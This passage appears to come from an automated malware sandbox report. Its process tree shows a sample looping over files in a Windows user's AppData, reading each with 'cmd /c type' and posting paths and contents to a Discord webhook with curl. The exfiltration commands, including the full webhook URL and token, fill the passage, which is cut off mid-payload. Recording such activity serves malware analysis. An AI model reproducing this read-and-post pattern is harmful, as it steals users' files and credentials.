  2⤵
  PID:2144
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975659895321.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975671793936.txt"
  2⤵
  PID:448
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975671793936.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975678039718.txt"
  2⤵
  PID:1016
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975678039718.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975680904158.txt"
  2⤵
  PID:2912
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975680904158.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975687953420.txt"
  2⤵
  PID:4772
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975687953420.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975713326468.txt"
  2⤵
  PID:3280
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975713326468.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975718405813.txt"
  2⤵
  PID:2484
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975718405813.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975723734478.txt"
  2⤵
  PID:2256
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975723734478.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975730000789.txt"
  2⤵
  PID:1672
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975730000789.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975737312313.txt"
  2⤵
  PID:3348
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975737312313.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975739496443.txt"
  2⤵
  PID:1856
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975739496443.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1704
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975741466824.txt"
  2⤵
  PID:2248
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975741466824.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975745308078.txt"
  2⤵
  PID:4240
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975745308078.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975752609462.txt"
  2⤵
  PID:4108
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975752609462.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975758653060.txt"
  2⤵
  PID:1360
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975758653060.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975767418526.txt"
  2⤵
  PID:2500
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975767418526.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975772618690.txt"
  2⤵
  PID:2040
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975772618690.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975788098054.txt"
  2⤵
  PID:3384
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975788098054.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2780
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975805920966.txt"
  2⤵
  PID:2068
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975805920966.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975812669997.txt"
  2⤵
  PID:1232
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975812669997.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975816231689.txt"
  2⤵
  PID:1336
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975816231689.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1016
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975862437558.txt"
  2⤵
  PID:2868
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842975862437558.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842981194110065.txt"
  2⤵
  PID:2024
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842981194110065.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842987003754234.txt"
  2⤵
  PID:1932
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842987003754234.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842989148906531.txt"
  2⤵
  PID:1156
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133842989148906531.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1700
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt"
  2⤵
  PID:3692
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:4356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt"
  2⤵
  PID:2980
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Temp\dd_NDP472-KB4054530-x86-x64-AllOS-ENU_decompression_log.txt\n[2/17/2025, 20:36:47] === Logging started: 2025/02/17 20:36:47 ===\n[2/17/2025, 20:36:47] Executable: C:\Users\Admin\NDP472-KB4054530-x86-x64-AllOS-ENU.exe v4.7.3081.0\n[2/17/2025, 20:36:47] --- logging level: standard ---\n[2/17/2025, 20:36:47] Successfully bound to the ClusApi.dll\n[2/17/2025, 20:36:47] Error 0x800706d9: Failed to open the current cluster\n[2/17/2025, 20:36:47] Cluster drive map: ''\n[2/17/2025, 20:36:47] Considering drive: 'C:\'...\n[2/17/2025, 20:36:47] Considering drive: 'D:\'...\n[2/17/2025, 20:36:47] Drive 'D:\' is rejected because of the unknown or unsuitable drive type\n[2/17/2025, 20:36:47] Drive 'C:\' has been selected as the largest fixed drive\n[2/17/2025, 20:36:47] Directory 'C:\6edea7ca02e6a6c5c76e3de9dceae6\' has been selected for file extraction\n[2/17/2025, 20:36:47] Extracting files to: C:\6edea7ca02e6a6c5c76e3de9dceae6\\n[2/17/2025, 20:37:3] Extraction took 15.438 seconds\n[2/17/2025, 20:37:3] Executing command line: 'C:\6edea7ca02e6a6c5c76e3de9dceae6\\Setup.exe /q /norestart /x86 /x64 /redist'\n[2/17/2025, 20:37:8] Exiting with result code: 0x0\n[2/17/2025, 20:37:8] === Logging stopped: 2025/02/17 20:37:08 ===\n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:2768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI57E7.txt"
  2⤵
  PID:4012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI5801.txt"
  2⤵
  PID:1692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI57E7.txt"
  2⤵
  PID:668
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI57E7.txt\n[02/17/25,20:35:53] ========== Logging started ==========\n[02/17/25,20:35:53] =====================================\n[02/17/25,20:35:53] No language specified in ini file default to OS language\n[02/17/25,20:35:53] Set lang to 1033\n[02/17/25,20:35:53] Pending Reboot Table state : Logging start \n[02/17/25,20:35:53] _________________________________________\n[02/17/25,20:35:53] There are no queued up pending reboot entries.\n[02/17/25,20:35:53] Logging property values\n[02/17/25,20:35:53] PROPERTY ProductName Microsoft Visual C++ 2008 Redistributable\n[02/17/25,20:35:53] PROPERTY c:\c9cfdba9a96d5ca9c1ac\vc_red.msi\n[02/17/25,20:35:53] PROPERTY ProductMsi vc_red.msi\n[02/17/25,20:35:53] PROPERTY Ini Filename c:\c9cfdba9a96d5ca9c1ac\install.ini\n[02/17/25,20:35:53] PROPERTY ProductCode \n[02/17/25,20:35:53] PROPERTY ProductRegKey \n[02/17/25,20:35:53] PROPERTY ProductRegValue \n[02/17/25,20:35:53] PROPERTY ProductRegData \n[02/17/25,20:35:53] PROPERTY ProductSupportURL http://go.microsoft.com/fwlink/?LinkId=119537\n[02/17/25,20:35:53] PROPERTY DefaultDirInstallToken \n[02/17/25,20:35:53] PROPERTY Install 0\n[02/17/25,20:35:53] PROPERTY SupportWin9X 0\n[02/17/25,20:35:53] PROPERTY MinNTVersion 5.0\n[02/17/25,20:35:53] PROPERTY CheckAdminRights 1\n[02/17/25,20:35:53] PROPERTY BlockOn64Platform \n[02/17/25,20:35:53] PROPERTY ShowFeatureOptions 0\n[02/17/25,20:35:53] PROPERTY ShowDestinationFolder 0\n[02/17/25,20:35:53] PROPERTY LogFilePrefix dd_vcredist\n[02/17/25,20:35:53] PROPERTY CustomTextPrefix CustomText\n[02/17/25,20:35:53] PROPERTY MSI Log name C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI57E7.txt\n[02/17/25,20:35:53] PROPERTY Msi Command Line properties \n[02/17/25,20:35:53] PROPERTY VerboseLog 1\n[02/17/25,20:35:53] PROPERTY RebootMode 0\n[02/17/25,20:35:53] PROPERTY UILanguage 1033\n[02/17/25,20:35:53] PROPERTY BitmapFile c:\c9cfdba9a96d5ca9c1ac\vcredist.bmp\n[02/17/25,20:35:53] PROPERTY User Canceled 0\n[02/17/25,20:35:53] PROPERTY Red \n[02/17/25,20:35:53] PROPERTY Green \n[02/17/25,20:35:53] PROPERTY Blue \n[02/17/25,20:35:53] PROPERTY Current Dir c:\c9cfdba9a96d5ca9c1ac\\n[02/17/25,20:35:53] PROPERTY Temp Dir C:\Users\Admin\AppData\Local\Temp\\n[02/17/25,20:35:53] PROPERTY Usage Mode 0\n[02/17/25,20:35:53] PROPERTY Admin Mode 0\n[02/17/25,20:35:53] PROPERTY Maintenance Mode \n[02/17/25,20:35:53] PROPERTY Silent Mode 1\n[02/17/25,20:35:53] PROPERTY Silent Mode Uninstall 0\n[02/17/25,20:35:53] PROPERTY WatsonSilent 0\n[02/17/25,20:35:53] PROPERTY WatsonUI 0\n[02/17/25,20:35:53] PROPERTY Silent Mode UI string /qb\n[02/17/25,20:35:53] PROPERTY SkipAllChecks 0\n[02/17/25,20:35:53] PROPERTY WatsonGenerateManifestOnly \n[02/17/25,20:35:53] PROPERTY UninstallWarning \n[02/17/25,20:35:53] PROPERTY ControlMSIService \n[02/17/25,20:35:53] PROPERTY RTL Language 0\n[02/17/25,20:35:53] PROPERTY PostSetupCommandRegKey \n[02/17/25,20:35:53] PROPERTY GlobDataINIPresent 1\n[02/17/25,20:35:53] Checking Windows Installer version...\n[02/17/25,20:35:53] msi.dll loaded ok\n[02/17/25,20:35:53] Looking for: 2.0.0\n[02/17/25,20:35:53] Found: 5.0.10011\n[02/17/25,20:35:53] Windows Installer version ok\n[02/17/25,20:35:53] Finished Checking Windows Installer version. Return code 0\n[02/17/25,20:35:53] Entering CMsiInstaller::ThreadInit\n[02/17/25,20:35:53] Leaving CMsiInstaller::ThreadInit\n[02/17/25,20:35:53] Checking Windows Installer version...\n[02/17/25,20:35:53] msi.dll loaded ok\n[02/17/25,20:35:53] Looking for: 2.0.0\n[02/17/25,20:35:53] Found: 5.0.10011\n[02/17/25,20:35:53] Windows Installer version ok\n[02/17/25,20:35:53] Finished Checking Windows Installer version. Return code 0\n[02/17/25,20:35:53] Entering Silent Mode CSilentNavigator::Start\n[02/17/25,20:35:53] Running all checks\n[02/17/25,20:35:53] Running system checks\n[02/17/25,20:35:53] SYSTEM CHECK: : One instance of setup running Passed\n[02/17/25,20:35:53] SYSTEM CHECK: : Administrative rights check Passed\n[02/17/25,20:35:53] SYSTEM CHECK: : Minimum NT Version 5.0 Passed\n[02/17/25,20:35:53] SYSTEM CHECK: : Not runing on 9x check Passed\n[02/17/25,20:35:53] Running prereq checks\n[02/17/25,20:35:53] Checking Windows Installer version...\n[02/17/25,20:35:53] msi.dll loaded ok\n[02/17/25,20:35:53] Looking for: 2.0.0\n[02/17/25,20:35:53] Found: 5.0.10011\n[02/17/25,20:35:53] Windows Installer version ok\n[02/17/25,20:35:53] Finished Checking Windows Installer version. Return code 0\n[02/17/25,20:35:53] PREREQ CHECK: : Microsoft Windows Installer 2.0 Passed\n[02/17/25,20:35:53] PREREQ CHECKS: Passed\n[02/17/25,20:35:53] Running block checks\n[02/17/25,20:35:53] BETA CHECK: Passed\n[02/17/25,20:35:53] Entering CMsiInstaller::IsInstalled\n[02/17/25,20:35:53] Entering CMsiInstaller::GetProductCode\n[02/17/25,20:35:53] Leaving CMsiInstaller::GetProductCode\n[02/17/25,20:35:53] Leaving CMsiInstaller::IsInstalled\n[02/17/25,20:35:53] Entering CMsiInstaller::RegisterUIInterfaces\n[02/17/25,20:35:53] Leaving CMsiInstaller::RegisterUIInterfaces\n[02/17/25,20:35:53] Entering CMsiInstaller::BeginInstall\n[02/17/25,20:35:54] Entering CMsiInstaller::SuppressReboot\n[02/17/25,20:35:54] Leaving CMsiInstaller::SuppressReboot\n[02/17/25,20:35:54] Entering CMsiInstaller::Stop\n[02/17/25,20:35:54] Leaving CMsiInstaller::WorkerThread\n[02/17/25,20:35:54] Leaving CMsiInstaller::Stop\n[02/17/25,20:35:54] Leaving CSilentNavigator::Start\n[02/17/25,20:35:54] Process returning code 0\n[02/17/25,20:35:54] Pending Reboot Table state : Logging start \n[02/17/25,20:35:54] _________________________________________\n[02/17/25,20:35:54] There are no queued up pending reboot entries.\n[02/17/25,20:35:54] =========== Logging ended ===========\n[02/17/25,20:35:54] =====================================\n[02/17/25,20:35:54] \n[02/17/25,20:35:54] \n[02/17/25,20:35:54] \n\"}" https://discord.com/api/webhooks/1331337371542884463/nAkAYBWbTa-qFw3J9ZgX5Ny0-wooQUT-UOq-3XzUA22fx2TY0quFDyOdk1wM1XcfYi16
  2⤵
  PID:1588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c type "C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI5801.txt"
  2⤵
  PID:628
- C:\Windows\system32\curl.exe
  curl -X POST -H "Content-Type: application/json" -d "{\"content\":\"Found file: C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI5801.txt\n[02/17/25,20:36:01] ========== Logging started ==========\n[02/17/25,20:36:01] =====================================\n[02/17/25,20:36:01] No language specified in ini file default to OS language\n[02/17/25,20:36:01] Set lang to 1033\n[02/17/25,20:36:01] Pending Reboot Table state : Logging start \n[02/17/25,20:36:01] _________________________________________\n[02/17/25,20:36:01] There are no queued up pending reboot entries.\n[02/17/25,20:36:01] Logging property values\n[02/17/25,20:36:01] PROPERTY ProductName Microsoft Visual C++ 2008 Redistributable\n[02/17/25,20:36:01] PROPERTY c:\c7cf14eb77b4274a1b4020e22476319f\vc_red.msi\n[02/17/25,20:36:01] PROPERTY ProductMsi vc_red.msi\n[02/17/25,20:36:01] PROPERTY Ini Filename c:\c7cf14eb77b4274a1b4020e22476319f\install.ini\n[02/17/25,20:36:01] PROPERTY ProductCode \n[02/17/25,20:36:01] PROPERTY ProductRegKey \n[02/17/25,20:36:01] PROPERTY ProductRegValue \n[02/17/25,20:36:01] PROPERTY ProductRegData \n[02/17/25,20:36:01] PROPERTY ProductSupportURL http://go.microsoft.com/fwlink/?LinkId=119537\n[02/17/25,20:36:01] PROPERTY DefaultDirInstallToken \n[02/17/25,20:36:01] PROPERTY Install 